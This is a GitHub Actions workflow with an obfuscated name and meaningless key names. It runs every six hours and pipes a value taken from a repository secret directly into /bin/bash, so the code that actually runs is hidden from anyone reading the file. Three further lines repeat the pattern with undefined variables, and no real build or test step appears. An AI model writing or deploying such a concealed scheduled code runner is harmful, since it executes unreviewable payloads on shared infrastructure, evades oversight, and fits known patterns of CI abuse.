name: candidateelectronic
on:
  workflow_dispatch:
  schedule:
    - cron: '55 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: candidateelectronic
        env:
          l1919: ${{ secrets.l1919 }}
        run: |
          echo $l1919 | jq -r .jdotz1 | /bin/bash
          echo $pl47513 | jq -r .fwgp7 | /bin/bash
          echo $xsms3866 | jq -r .us80876 | /bin/bash
          echo $geib99350 | jq -r .aucb0377 | /bin/bash

